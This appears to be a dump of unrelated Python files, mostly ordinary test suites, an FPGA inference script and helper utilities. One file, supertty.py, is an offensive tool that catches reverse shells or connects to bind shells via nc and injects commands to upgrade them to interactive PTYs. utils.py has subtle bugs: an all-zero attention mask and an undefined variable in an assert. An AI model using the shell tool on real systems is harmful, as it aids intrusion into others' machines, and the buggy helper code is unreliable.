def _(self, arg: int):
return "int"
@t.register
def _(self, arg: str):
return "str"
a = A()
self.assertEqual(a.t(0), "int")
self.assertEqual(a.t(''), "str")
self.assertEqual(a.t(0.0), "base")
def test_invalid_registrations(self):
msg_prefix = "Invalid first argument to `register()`: "
msg_suffix = (
". Use either `@register(some_class)` or plain `@register` on an "
"annotated function."
)
@functools.singledispatch
def i(arg):
return "base"
with self.assertRaises(TypeError) as exc:
@i.register(42)
def _(arg):
return "I annotated with a non-type"
self.assertTrue(str(exc.exception).startswith(msg_prefix + "42"))
self.assertTrue(str(exc.exception).endswith(msg_suffix))
with self.assertRaises(TypeError) as exc:
@i.register
def _(arg):
return "I forgot to annotate"
self.assertTrue(str(exc.exception).startswith(msg_prefix +
"<function TestSingleDispatch.test_invalid_registrations.<locals>._"
))
self.assertTrue(str(exc.exception).endswith(msg_suffix))
with self.assertRaises(TypeError) as exc:
@i.register
def _(arg: typing.Iterable[str]):
# At runtime, dispatching on generics is impossible.
# When registering implementations with singledispatch, avoid
# types from `typing`. Instead, annotate with regular types
# or ABCs.
return "I annotated with a generic collection"
self.assertTrue(str(exc.exception).startswith(
"Invalid annotation for 'arg'."
))
self.assertTrue(str(exc.exception).endswith(
'typing.Iterable[str] is not a class.'
))
def test_invalid_positional_argument(self):
@functools.singledispatch
def f(*args):
pass
msg = 'f requires at least 1 positional argument'
with self.assertRaisesRegex(TypeError, msg):
f()
class CachedCostItem:
_cost = 1
def __init__(self):
self.lock = py_functools.RLock()
@py_functools.cached_property
def cost(self):
"""The cost of the item."""
with self.lock:
self._cost += 1
return self._cost
class OptionallyCachedCostItem:
_cost = 1
def get_cost(self):
"""The cost of the item."""
self._cost += 1
return self._cost
cached_cost = py_functools.cached_property(get_cost)
class CachedCostItemWait:
def __init__(self, event):
self._cost = 1
self.lock = py_functools.RLock()
self.event = event
@py_functools.cached_property
def cost(self):
self.event.wait(1)
with self.lock:
self._cost += 1
return self._cost
class CachedCostItemWithSlots:
__slots__ = ('_cost')
def __init__(self):
self._cost = 1
@py_functools.cached_property
def cost(self):
raise RuntimeError('never called, slots not supported')
class TestCachedProperty(unittest.TestCase):
def test_cached(self):
item = CachedCostItem()
self.assertEqual(item.cost, 2)
self.assertEqual(item.cost, 2) # not 3
def test_cached_attribute_name_differs_from_func_name(self):
item = OptionallyCachedCostItem()
self.assertEqual(item.get_cost(), 2)
self.assertEqual(item.cached_cost, 3)
self.assertEqual(item.get_cost(), 4)
self.assertEqual(item.cached_cost, 3)
def test_threaded(self):
go = threading.Event()
item = CachedCostItemWait(go)
num_threads = 3
orig_si = sys.getswitchinterval()
sys.setswitchinterval(1e-6)
try:
threads = [
threading.Thread(target=lambda: item.cost)
for k in range(num_threads)
]
with threading_helper.start_threads(threads):
go.set()
finally:
sys.setswitchinterval(orig_si)
self.assertEqual(item.cost, 2)
def test_object_with_slots(self):
item = CachedCostItemWithSlots()
with self.assertRaisesRegex(
TypeError,
"No '__dict__' attribute on 'CachedCostItemWithSlots' instance to cache 'cost' property.",
):
item.cost
def test_immutable_dict(self):
class MyMeta(type):
@py_functools.cached_property
def prop(self):
return True
class MyClass(metaclass=MyMeta):
pass
with self.assertRaisesRegex(
TypeError,
"The '__dict__' attribute on 'MyMeta' instance does not support item assignment for caching 'prop' property.",
):
MyClass.prop
def test_reuse_different_names(self):
"""Disallow this case because decorated function a would not be cached."""
with self.assertRaises(RuntimeError) as ctx:
class ReusedCachedProperty:
@py_functools.cached_property
def a(self):
pass
b = a
self.assertEqual(
str(ctx.exception.__context__),
str(TypeError("Cannot assign the same cached_property to two different names ('a' and 'b')."))
)
def test_reuse_same_name(self):
"""Reusing a cached_property on different classes under the same name is OK."""
counter = 0
@py_functools.cached_property
def _cp(_self):
nonlocal counter
counter += 1
return counter
class A:
cp = _cp
class B:
cp = _cp
a = A()
b = B()
self.assertEqual(a.cp, 1)
self.assertEqual(b.cp, 2)
self.assertEqual(a.cp, 1)
def test_set_name_not_called(self):
cp = py_functools.cached_property(lambda s: None)
class Foo:
pass
Foo.cp = cp
with self.assertRaisesRegex(
TypeError,
"Cannot use cached_property instance without calling __set_name__ on it.",
):
Foo().cp
def test_access_from_class(self):
self.assertIsInstance(CachedCostItem.cost, py_functools.cached_property)
def test_doc(self):
self.assertEqual(CachedCostItem.cost.__doc__, "The cost of the item.")
if __name__ == '__main__':
unittest.main()
|
googlenet_resnet50.py
|
#!/usr/bin/env python
# Copyright 2019 Xilinx Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import sys, os
import glob
import time
import threading
from apps.aks.libs import aks
def usage(exe):
print("[INFO] Usage: ")
print("[INFO] ---------------------- ")
print("[INFO] ", exe, " <img-dir-for-googlenet> <image-dir-for-resnet50> ")
def enqJobThread (name, graph, images):
# Get AKS Sys Manager
sysMan = aks.SysManager()
print ("[INFO] Starting Enqueue:", name)
for img in images:
sysMan.enqueueJob(graph, img)
def main(imageDirectory, graphs):
fileExtension = ('*.jpg', '*.JPEG', '*.png')
kernelDir = "kernel_zoo"
sysMan = aks.SysManager()
sysMan.loadKernels(kernelDir)
lgraphs = {}
images = {}
# Load graphs
for graphName, graphJson in graphs.items():
sysMan.loadGraphs(graphJson)
lgraphs[graphName] = sysMan.getGraph(graphName)
images = {}
for graphName in lgraphs.keys():
images[graphName] = []
for ext in fileExtension:
images[graphName].extend(glob.glob(imageDirectory[graphName] + '/' + ext))
pushThreads = []
sysMan.resetTimer()
t0 = time.time()
for name, gr in lgraphs.items():
th = threading.Thread(target=enqJobThread, args=(name, gr, images[name],))
th.start()
pushThreads.append(th)
for th in pushThreads:
th.join()
sysMan.waitForAllResults()
t1 = time.time()
print("\n[INFO] Overall FPS:", len(images) * 2 / (t1-t0))
for name, gr in lgraphs.items():
print("\n[INFO] Graph:", name)
sysMan.report(gr)
print("")
# Destroy SysMan
sysMan.clear()
if __name__ == "__main__":
if (len(sys.argv) != 3):
print("[ERROR] Invalid Usage!")
usage(sys.argv[0])
exit(1)
if not os.path.isdir(sys.argv[1]):
print("[ERROR] No such directory:", sys.argv[1])
usage(sys.argv[0])
exit(1)
if not os.path.isdir(sys.argv[2]):
print("[ERROR] No such directory:", sys.argv[2])
usage(sys.argv[0])
exit(1)
# Get images
imageDirectory = {}
imageDirectory['googlenet_no_runner'] = sys.argv[1]
imageDirectory['resnet50_no_runner'] = sys.argv[2]
# GoogleNet and TinyYolo-v3 graphs
graphs = {}
graphs['googlenet_no_runner'] = 'graph_zoo/graph_googlenet_no_runner.json'
graphs['resnet50_no_runner'] = 'graph_zoo/graph_resnet50_no_runner.json'
# Process graphs
main(imageDirectory, graphs)
|
supertty.py
|
#!/usr/bin/env python
"""SuperTTY v1.0
Usage:
supertty.py --port <port> --host <host> [--udp] [--shell <shell>]
supertty.py --port <port> [--ip <ip>] [--udp] [--shell <shell>]
supertty.py (-h | --help)
Options:
-h --help Show this screen
--port <port> Port number to listen on to to connect to the remote host on [default: 4445]
--host <host> Host to connect to for bind shells
--udp Listen for shells over udp
--ip <ip> ip to listen on for reverse shells [default: "0.0.0.0"]
--shell <shell> Shell spawn as PTY [default: /bin/bash]
"""
banner = """ ( )
)\ ) * ) * ) ( /( ) )
(()/( ( ( ( ` ) /(` ) /( )\()) ) ( /( ( /(
/(_))))\ ` ) ))\ )( ( )(_))( )(_)|(_)\ /(( )\()))\())
(_)) /((_)/(/( /((_|()\(_(_())(_(_())_ ((_) (_))((_)\((_)\
/ __(_))(((_)_\(_)) ((_)_ _||_ _\ \ / / _)((_) (_) (_)
\__ \ || | '_ \) -_)| '_| | | | | \ V / \ V /| || () |
|___/\_,_| .__/\___||_| |_| |_| |_| \_/ |_(_)__/
|_|
(c) Bad Hombres 2017
"""
import os
import subprocess
import sys
import time
import signal
import select
import pty
import tty
import threading
import time
import fcntl
from docopt import docopt
args = docopt(__doc__, version="SuperTTY 1.0")
p = None
print banner
nc = []
if args["--host"] is None:
print "[+] Starting a reverse listener on port: %s" % args["--port"]
nc = ["nc", "-nvlp", args["--port"]]
if args["--udp"]:
nc[1] = "-nlvup"
else:
print "[+] Connecting to a bind shell on: %s:%s" % (args["--host"], args["--port"])
nc = ["nc", args["--host"], args["--port"]]
def sigint_handler(signal, frame):
print "!!!!!SIGINT!!!!!"
p.kill()
sys.exit()
signal.signal(signal.SIGINT, sigint_handler)
try:
term = os.environ["TERM"]
rows, columns = os.popen('stty size', 'r').read().split()
print "[+] Got terminal: %s " % term
print "[+] Got terminal size (%s rows, %s columns)" % (rows, columns)
print "[+] Setting up local terminal....."
os.system("stty raw -echo")
master, slave = pty.openpty()
#tty.setraw(master)
#tty.setraw(slave)
p = subprocess.Popen(nc, stdin=subprocess.PIPE, stdout = slave, stderr = slave, close_fds = True)
p.stdout = os.fdopen(os.dup(master), 'r+')
p.stderr = os.fdopen(os.dup(master), 'r+')
os.close(master)
os.close(slave)
print p.stdout.read(30)
go = threading.Event()
fd = p.stdout.fileno()
fl = fcntl.fcntl(fd, fcntl.F_GETFL)
fcntl.fcntl(fd, fcntl.F_SETFL, fl | os.O_NONBLOCK)
def recv_data():
while not go.isSet():
try:
data = p.stdout.read(1024)
if data:
sys.stdout.write(data)
sys.stdout.flush()
except:
pass
t = threading.Thread(target = recv_data)
t.start()
shell = args["--shell"]
p.stdin.write("python -c 'import pty; pty.spawn(\"%s\")'\n" % shell)
p.stdin.flush()
time.sleep(2)
p.stdin.write("export TERM=%s\n" % term)
p.stdin.flush()
p.stdin.write("export SHELL=%s\n" % shell)
p.stdin.flush()
p.stdin.write("stty rows %s columns %s\n" % (rows, columns))
p.stdin.flush()
p.stdin.write("reset\n")
p.stdin.flush()
while 1:
line = sys.stdin.read(1)
if ord(line[0]) in [4]: break
if line == "": break
p.stdin.write(line)
go.set()
except:
print "[!] An unexpected error occurred: {e}".format(e=sys.exc_info()[0])
finally:
os.system("stty raw echo")
print "[+} Resetting local terminal....."
os.system("reset")
p.kill()
print banner
print "[+} Hack el planeta!....."
os._exit(0)
|
utils.py
|
import numpy as np
from queue import Queue
from threading import Thread
# Yield successive {n}-sized chunks from {lst}.
def chunks(lst, n):
for i in range(0, len(lst), n):
yield lst[i:i + n]
def _map_reduce_thread(map_fn, input, q):
q.put(map_fn(input))
# Performs a multi-threaded map-reduce operation.
# This is done by chunking {inputs} into at most {max_threads} separate lists, then
# feeding each list into a separate {map_fn} which runs on its own thread.
# Waits for each thread to return its results. Results are compiled into a list of results and
# fed to the {reduce_fn}. The result of this call is returned.
def perform_map_reduce(map_fn, reduce_fn, inputs, max_threads):
threads = []
thread_count = min(max_threads, len(inputs))
chunked_inputs = chunks(inputs, int(len(inputs) / thread_count))
q = Queue()
for c in chunked_inputs:
t = Thread(target=lambda fn, i, qu: qu.put(fn(i)), args=(map_fn, c, q))
t.start()
threads.append(t)
for t in threads:
t.join()
return reduce_fn(list(q.queue))
def downconvert_tf_dataset(dataset, tok, pad_token=0, max_seq_len=128):
inputs = []
atts = []
toks = []
outputs = []
for i,m in enumerate(dataset):
input = tok.encode_plus(m['sentence'].numpy().decode("utf-8"),\
add_special_tokens=True, max_length=max_seq_len,)
input_ids, token_type_ids = input["input_ids"], input["token_type_ids"]
attention_mask = [0] * len(input_ids)
# Pad strings to exactly max_seq_len
padding_length = max_seq_len - len(input_ids)
input_ids = input_ids + ([pad_token] * padding_length)
attention_mask = attention_mask + ([0] * padding_length)
token_type_ids = token_type_ids + ([0] * padding_length)
# Double-check results.
assert len(input_ids) == max_seq_len, "Error with input length {} vs {}".format(len(input_ids), max_length)
assert len(attention_mask) == max_seq_len, "Error with input length {} vs {}".format(
len(attention_mask), max_seq_len
)
assert len(token_type_ids) == max_seq_len, "Error with input length {} vs {}".format(
len(token_type_ids), max_seq_len
)
# Form lists.
inputs.append(np.asarray(input_ids))
atts.append(np.asarray(attention_mask))
toks.append(np.asarray(token_type_ids))
outputs.append(m['label'].numpy())
return [np.asarray(inputs), np.asarray(atts), np.asarray(toks)], np.asarray(outputs)
|
testing.py
|
"""Pytest fixtures and other helpers for doing testing by end-users."""
from __future__ import absolute_import, division, print_function
__metaclass__ = type
from contextlib import closing
import errno
import socket
import threading
import time
import pytest
from six.moves import http_client
import cheroot.server
from cheroot.test import webtest
import cheroot.wsgi
EPHEMERAL_PORT = 0
NO_INTERFACE = None # Using this or '' will cause an exception
ANY_INTERFACE_IPV4 = '0.0.0.0'
ANY_INTERFACE_IPV6 = '::'
config = {
cheroot.wsgi.Server: {
'bind_addr': (NO_INTERFACE, EPHEMERAL_PORT),
'wsgi_app': None,
},
cheroot.server.HTTPServer: {
'bind_addr': (NO_INTERFACE, EPHEMERAL_PORT),
'gateway': cheroot.server.Gateway,
},
}
def cheroot_server(server_factory):
"""Set up and tear down a Cheroot server instance."""
conf = config[server_factory].copy()
bind_port = conf.pop('bind_addr')[-1]
for interface in ANY_INTERFACE_IPV6, ANY_INTERFACE_IPV4:
try:
actual_bind_addr = (interface, bind_port)
httpserver = server_factory( # create it
bind_addr=actual_bind_addr,
**conf
)
except OSError:
pass
else:
break
httpserver.shutdown_timeout = 0 # Speed-up tests teardown
threading.Thread(target=httpserver.safe_start).start() # spawn it
while not httpserver.ready: # wait until fully initialized and bound
time.sleep(0.1)
yield httpserver
httpserver.stop() # destroy it
@pytest.fixture(scope='module')
def wsgi_server():
"""Set up and tear down a Cheroot WSGI server instance."""
for srv in cheroot_server(cheroot.wsgi.Server):
yield srv
@pytest.fixture(scope='module')
def native_server():
"""Set up and tear down a Cheroot HTTP server instance."""
for srv in cheroot_server(cheroot.server.HTTPServer):
yield srv
class _TestClient:
def __init__(self, server):
self._interface, self._host, self._port = _get_conn_data(
server.bind_addr,
)
self.server_instance = server
self._http_connection = self.get_connection()
def get_connection(self):
name = '{interface}:{port}'.format(
interface=self._interface,
port=self._port,
)
conn_cls = (
http_client.HTTPConnection
if self.server_instance.ssl_adapter is None else
http_client.HTTPSConnection
)
return conn_cls(name)
def request(
self, uri, method='GET', headers=None, http_conn=None,
protocol='HTTP/1.1',
):
return webtest.openURL(
uri, method=method,
headers=headers,
host=self._host, port=self._port,
http_conn=http_conn or self._http_connection,
protocol=protocol,
)
def __getattr__(self, attr_name):
def _wrapper(uri, **kwargs):
http_method = attr_name.upper()
return self.request(uri, method=http_method, **kwargs)
return _wrapper
def _probe_ipv6_sock(interface):
# Alternate way is to check IPs on interfaces using glibc, like:
# github.com/Gautier/minifail/blob/master/minifail/getifaddrs.py
try:
with closing(socket.socket(family=socket.AF_INET6)) as sock:
sock.bind((interface, 0))
except (OSError, socket.error) as sock_err:
# In Python 3 socket.error is an alias for OSError
# In Python 2 socket.error is a subclass of IOError
if sock_err.errno != errno.EADDRNOTAVAIL:
raise
else:
return True
return False
def _get_conn_data(bind_addr):
if isinstance(bind_addr, tuple):
host, port = bind_addr
else:
host, port = bind_addr, 0
interface = webtest.interface(host)
if ':' in interface and not _probe_ipv6_sock(interface):
interface = '127.0.0.1'
if ':' in host:
host = interface
return interface, host, port
def get_server_client(server):
"""Create and return a test client for the given server."""
return _TestClient(server)
|
test_socket.py
|
import unittest
from test import support
import errno
import io
import itertools
import socket
import select
import tempfile
import time
import traceback
import queue
import sys
import os
import array
import contextlib
from weakref import proxy
import signal
import math
import pickle
import struct
import random
import string
import _thread as thread
import threading
try:
import multiprocessing
except ImportError:
multiprocessing = False
try:
import fcntl
except ImportError:
fcntl = None
HOST = support.HOST
MSG = 'Michael Gilfix was here\u1234\r\n'.encode('utf-8') ## test unicode string and carriage return
VSOCKPORT = 1234
try:
import _socket
except ImportError:
_socket = None
def get_cid():
if fcntl is None:
return None
try:
with open("/dev/vsock", "rb") as f:
r = fcntl.ioctl(f, socket.IOCTL_VM_SOCKETS_GET_LOCAL_CID, " ")
except OSError:
return None
else:
return struct.unpack("I", r)[0]
def _have_socket_can():
"""Check whether CAN sockets are supported on this host."""
try:
s = socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW)
except (AttributeError, OSError):
return False
else:
s.close()
return True
def _have_socket_can_isotp():
"""Check whether CAN ISOTP sockets are supported on this host."""
try:
s = socket.socket(socket.PF_CAN, socket.SOCK_DGRAM, socket.CAN_ISOTP)
except (AttributeError, OSError):
return False
else:
s.close()
return True
def _have_socket_rds():
"""Check whether RDS sockets are supported on this host."""
try:
s = socket.socket(socket.PF_RDS, socket.SOCK_SEQPACKET, 0)
except (AttributeError, OSError):
return False
else:
s.close()
return True
def _have_socket_alg():
"""Check whether AF_ALG sockets are supported on this host."""
try:
s = socket.socket(socket.AF_ALG, socket.SOCK_SEQPACKET, 0)
except (AttributeError, OSError):
return False
else:
s.close()
return True
def _have_socket_vsock():
"""Check whether AF_VSOCK sockets are supported on this host."""
ret = get_cid() is not None
return ret
HAVE_SOCKET_CAN = _have_socket_can()
HAVE_SOCKET_CAN_ISOTP = _have_socket_can_isotp()
HAVE_SOCKET_RDS = _have_socket_rds()
HAVE_SOCKET_ALG = _have_socket_alg()
HAVE_SOCKET_VSOCK = _have_socket_vsock()
# Size in bytes of the int type
SIZEOF_INT = array.array("i").itemsize
class SocketTCPTest(unittest.TestCase):
def setUp(self):
self.serv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.port = support.bind_port(self.serv)
self.serv.listen()
def tearDown(self):
self.serv.close()
self.serv = None
class SocketUDPTest(unittest.TestCase):
def setUp(self):
self.serv = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.port = support.bind_port(self.serv)
def tearDown(self):
self.serv.close()
self.serv = None
class ThreadSafeCleanupTestCase(unittest.TestCase):
"""Subclass of unittest.TestCase with thread-safe cleanup methods.
This subclass protects the addCleanup() and doCleanups() methods
with a recursive lock.
"""
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self._cleanup_lock = threading.RLock()
def addCleanup(self, *args, **kwargs):
with self._cleanup_lock:
return super().addCleanup(*args, **kwargs)
def doCleanups(self, *args, **kwargs):
with self._cleanup_lock:
return super().doCleanups(*args, **kwargs)
class SocketCANTest(unittest.TestCase):
"""To be able to run this test, a `vcan0` CAN interface can be created with
the following commands:
# modprobe vcan
# ip link add dev vcan0 type vcan
# ifconfig vcan0 up
"""
interface = 'vcan0'
bufsize = 128
"""The CAN frame structure is defined in <linux/can.h>:
struct can_frame {
canid_t can_id; /* 32 bit CAN_ID + EFF/RTR/ERR flags */
__u8 can_dlc; /* data length code: 0 .. 8 */
__u8 data[8] __attribute__((aligned(8)));
};
"""
can_frame_fmt = "=IB3x8s"
can_frame_size = struct.calcsize(can_frame_fmt)
"""The Broadcast Management Command frame structure is defined
in <linux/can/bcm.h>:
struct bcm_msg_head {
__u32 opcode;
__u32 flags;
__u32 count;
struct timeval ival1, ival2;
canid_t can_id;
__u32 nframes;
struct can_frame frames[0];
}
`bcm_msg_head` must be 8 bytes aligned because of the `frames` member (see
`struct can_frame` definition). Must use native not standard types for packing.
"""
bcm_cmd_msg_fmt = "@3I4l2I"
bcm_cmd_msg_fmt += "x" * (struct.calcsize(bcm_cmd_msg_fmt) % 8)
def setUp(self):
self.s = socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW)
self.addCleanup(self.s.close)
try:
self.s.bind((self.interface,))
except OSError:
self.skipTest('network interface `%s` does not exist' %
self.interface)
class SocketRDSTest(unittest.TestCase):
"""To be able to run this test, the `rds` kernel module must be loaded:
# modprobe rds
"""
bufsize = 8192
def setUp(self):
self.serv = socket.socket(socket.PF_RDS, socket.SOCK_SEQPACKET, 0)
self.addCleanup(self.serv.close)
try:
self.port = support.bind_port(self.serv)
except OSError:
self.skipTest('unable to bind RDS socket')
class ThreadableTest:
"""Threadable Test class
The ThreadableTest class makes it easy to create a threaded
client/server pair from an existing unit test. To create a
new threaded class from an existing unit test, use multiple
inheritance:
class NewClass (OldClass, ThreadableTest):
pass
This class defines two new fixture functions with obvious
purposes for overriding:
clientSetUp ()
clientTearDown ()
Any new test functions within the class must then define
tests in pairs, where the test name is preceded with a
'_' to indicate the client portion of the test. Ex:
def testFoo(self):
# Server portion
def _testFoo(self):
# Client portion
Any exceptions raised by the clients during their tests
are caught and transferred to the main thread to alert
the testing framework.
Note, the server setup function cannot call any blocking
functions that rely on the client thread during setup,
unless serverExplicitReady() is called just before
the blocking call (such as in setting up a client/server
connection and performing the accept() in setUp().
"""
def __init__(self):
# Swap the true setup function
self.__setUp = self.setUp
self.__tearDown = self.tearDown
self.setUp = self._setUp
self.tearDown = self._tearDown
def serverExplicitReady(self):
"""This method allows the server to explicitly indicate that
it wants the client thread to proceed. This is useful if the
server is about to execute a blocking routine that is
dependent upon the client thread during its setup routine."""
self.server_ready.set()
def _setUp(self):
self.wait_threads = support.wait_threads_exit()
self.wait_threads.__enter__()
self.server_ready = threading.Event()
self.client_ready = threading.Event()
self.done = threading.Event()
self.queue = queue.Queue(1)
self.server_crashed = False
# Do some munging to start the client test.
methodname = self.id()
i = methodname.rfind('.')
methodname = methodname[i+1:]
test_method = getattr(self, '_' + methodname)
self.client_thread = thread.start_new_thread(
self.clientRun, (test_method,))
try:
self.__setUp()
except:
self.server_crashed = True
raise
finally:
self.server_ready.set()
self.client_ready.wait()
def _tearDown(self):
self.__tearDown()
self.done.wait()
self.wait_threads.__exit__(None, None, None)
if self.queue.qsize():
exc = self.queue.get()
raise exc
def clientRun(self, test_func):
self.server_ready.wait()
try:
self.clientSetUp()
except BaseException as e:
self.queue.put(e)
self.clientTearDown()
return
finally:
self.client_ready.set()
if self.server_crashed:
self.clientTearDown()
return
if not hasattr(test_func, '__call__'):
raise TypeError("test_func must be a callable function")
try:
test_func()
except BaseException as e:
self.queue.put(e)
finally:
self.clientTearDown()
def clientSetUp(self):
raise NotImplementedError("clientSetUp must be implemented.")
def clientTearDown(self):
self.done.set()
thread.exit()
class ThreadedTCPSocketTest(SocketTCPTest, ThreadableTest):
def __init__(self, methodName='runTest'):
SocketTCPTest.__init__(self, methodName=methodName)
ThreadableTest.__init__(self)
def clientSetUp(self):
self.cli = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
def clientTearDown(self):
self.cli.close()
self.cli = None
ThreadableTest.clientTearDown(self)
class ThreadedUDPSocketTest(SocketUDPTest, ThreadableTest):
def __init__(self, methodName='runTest'):
SocketUDPTest.__init__(self, methodName=methodName)
ThreadableTest.__init__(self)
def clientSetUp(self):
self.cli = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
def clientTearDown(self):
self.cli.close()
self.cli = None
ThreadableTest.clientTearDown(self)
class ThreadedCANSocketTest(SocketCANTest, ThreadableTest):
def __init__(self, methodName='runTest'):
SocketCANTest.__init__(self, methodName=methodName)
ThreadableTest.__init__(self)
def clientSetUp(self):
self.cli = socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW)
try:
self.cli.bind((self.interface,))
except OSError:
# skipTest should not be called here, and will be called in the
# server instead
pass
def clientTearDown(self):
self.cli.close()
self.cli = None
ThreadableTest.clientTearDown(self)
class ThreadedRDSSocketTest(SocketRDSTest, ThreadableTest):
def __init__(self, methodName='runTest'):
SocketRDSTest.__init__(self, methodName=methodName)
ThreadableTest.__init__(self)
def clientSetUp(self):
self.cli = socket.socket(socket.PF_RDS, socket.SOCK_SEQPACKET, 0)
try:
# RDS sockets must be bound explicitly to send or receive data
self.cli.bind((HOST, 0))
self.cli_addr = self.cli.getsockname()
except OSError:
# skipTest should not be called here, and will be called in the
# server instead
pass
def clientTearDown(self):
self.cli.close()
self.cli = None
ThreadableTest.clientTearDown(self)
@unittest.skipIf(fcntl is None, "need fcntl")
@unittest.skipUnless(HAVE_SOCKET_VSOCK,
'VSOCK sockets required for this test.')
@unittest.skipUnless(get_cid() != 2,
"This test can only be run on a virtual guest.")
class ThreadedVSOCKSocketStreamTest(unittest.TestCase, ThreadableTest):
def __init__(self, methodName='runTest'):
unittest.TestCase.__init__(self, methodName=methodName)
ThreadableTest.__init__(self)
def setUp(self):
self.serv = socket.socket(socket.AF_VSOCK, socket.SOCK_STREAM)
self.addCleanup(self.serv.close)
self.serv.bind((socket.VMADDR_CID_ANY, VSOCKPORT))
self.serv.listen()
self.serverExplicitReady()
self.conn, self.connaddr = self.serv.accept()
self.addCleanup(self.conn.close)
def clientSetUp(self):
time.sleep(0.1)
self.cli = socket.socket(socket.AF_VSOCK, socket.SOCK_STREAM)
self.addCleanup(self.cli.close)
cid = get_cid()
self.cli.connect((cid, VSOCKPORT))
def testStream(self):
msg = self.conn.recv(1024)
self.assertEqual(msg, MSG)
def _testStream(self):
self.cli.send(MSG)
self.cli.close()
class SocketConnectedTest(ThreadedTCPSocketTest):
"""Socket tests for client-server connection.
self.cli_conn is a client socket connected to the server. The
setUp() method guarantees that it is connected to the server.
"""
def __init__(self, methodName='runTest'):
ThreadedTCPSocketTest.__init__(self, methodName=methodName)
def setUp(self):
ThreadedTCPSocketTest.setUp(self)
# Indicate explicitly we're ready for the client thread to
# proceed and then perform the blocking call to accept
self.serverExplicitReady()
conn, addr = self.serv.accept()
self.cli_conn = conn
def tearDown(self):
self.cli_conn.close()
self.cli_conn = None
ThreadedTCPSocketTest.tearDown(self)
def clientSetUp(self):
ThreadedTCPSocketTest.clientSetUp(self)
self.cli.connect((HOST, self.port))
self.serv_conn = self.cli
def clientTearDown(self):
self.serv_conn.close()
self.serv_conn = None
ThreadedTCPSocketTest.clientTearDown(self)
class SocketPairTest(unittest.TestCase, ThreadableTest):
def __init__(self, methodName='runTest'):
unittest.TestCase.__init__(self, methodName=methodName)
ThreadableTest.__init__(self)
def setUp(self):
self.serv, self.cli = socket.socketpair()
def tearDown(self):
self.serv.close()
self.serv = None
def clientSetUp(self):
pass
def clientTearDown(self):
self.cli.close()
self.cli = None
ThreadableTest.clientTearDown(self)
# The following classes are used by the sendmsg()/recvmsg() tests.
# Combining, for instance, ConnectedStreamTestMixin and TCPTestBase
# gives a drop-in replacement for SocketConnectedTest, but different
# address families can be used, and the attributes serv_addr and
# cli_addr will be set to the addresses of the endpoints.
class SocketTestBase(unittest.TestCase):
"""A base class for socket tests.
Subclasses must provide methods newSocket() to return a new socket
and bindSock(sock) to bind it to an unused address.
Creates a socket self.serv and sets self.serv_addr to its address.
"""
def setUp(self):
self.serv = self.newSocket()
self.bindServer()
def bindServer(self):
"""Bind server socket and set self.serv_addr to its address."""
self.bindSock(self.serv)
self.serv_addr = self.serv.getsockname()
def tearDown(self):
self.serv.close()
self.serv = None
class SocketListeningTestMixin(SocketTestBase):
"""Mixin to listen on the server socket."""
def setUp(self):
super().setUp()
self.serv.listen()
class ThreadedSocketTestMixin(ThreadSafeCleanupTestCase, SocketTestBase,
ThreadableTest):
"""Mixin to add client socket and allow client/server tests.
Client socket is self.cli and its address is self.cli_addr. See
ThreadableTest for usage information.
"""
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
ThreadableTest.__init__(self)
def clientSetUp(self):
self.cli = self.newClientSocket()
self.bindClient()
def newClientSocket(self):
"""Return a new socket for use as client."""
return self.newSocket()
def bindClient(self):
"""Bind client socket and set self.cli_addr to its address."""
self.bindSock(self.cli)
self.cli_addr = self.cli.getsockname()
def clientTearDown(self):
self.cli.close()
self.cli = None
ThreadableTest.clientTearDown(self)
class ConnectedStreamTestMixin(SocketListeningTestMixin,
ThreadedSocketTestMixin):
"""Mixin to allow client/server stream tests with connected client.
Server's socket representing connection to client is self.cli_conn
and client's connection to server is self.serv_conn. (Based on
SocketConnectedTest.)
"""
def setUp(self):
super().setUp()
# Indicate explicitly we're ready for the client thread to
# proceed and then perform the blocking call to accept
self.serverExplicitReady()
conn, addr = self.serv.accept()
self.cli_conn = conn
def tearDown(self):
self.cli_conn.close()
self.cli_conn = None
super().tearDown()
def clientSetUp(self):
super().clientSetUp()
self.cli.connect(self.serv_addr)
self.serv_conn = self.cli
def clientTearDown(self):
try:
self.serv_conn.close()
self.serv_conn = None
except AttributeError:
pass
super().clientTearDown()
class UnixSocketTestBase(SocketTestBase):
"""Base class for Unix-domain socket tests."""
# This class is used for file descriptor passing tests, so we
# create the sockets in a private directory so that other users
# can't send anything that might be problematic for a privileged
# user running the tests.
def setUp(self):
self.dir_path = tempfile.mkdtemp()
self.addCleanup(os.rmdir, self.dir_path)
super().setUp()
def bindSock(self, sock):
path = tempfile.mktemp(dir=self.dir_path)
support.bind_unix_socket(sock, path)
self.addCleanup(support.unlink, path)
class UnixStreamBase(UnixSocketTestBase):
"""Base class for Unix-domain SOCK_STREAM tests."""
def newSocket(self):
return socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
class InetTestBase(SocketTestBase):
"""Base class for IPv4 socket tests."""
host = HOST
def setUp(self):
super().setUp()
self.port = self.serv_addr[1]
def bindSock(self, sock):
support.bind_port(sock, host=self.host)
class TCPTestBase(InetTestBase):
"""Base class for TCP-over-IPv4 tests."""
def newSocket(self):
return socket.socket(socket.AF_INET, socket.SOCK_STREAM)
class UDPTestBase(InetTestBase):
"""Base class for UDP-over-IPv4 tests."""
def newSocket(self):
return socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
class SCTPStreamBase(InetTestBase):
"""Base class for SCTP tests in one-to-one (SOCK_STREAM) mode."""
def newSocket(self):
return socket.socket(socket.AF_INET, socket.SOCK_STREAM,
socket.IPPROTO_SCTP)
class Inet6TestBase(InetTestBase):
"""Base class for IPv6 socket tests."""
host = support.HOSTv6
class UDP6TestBase(Inet6TestBase):
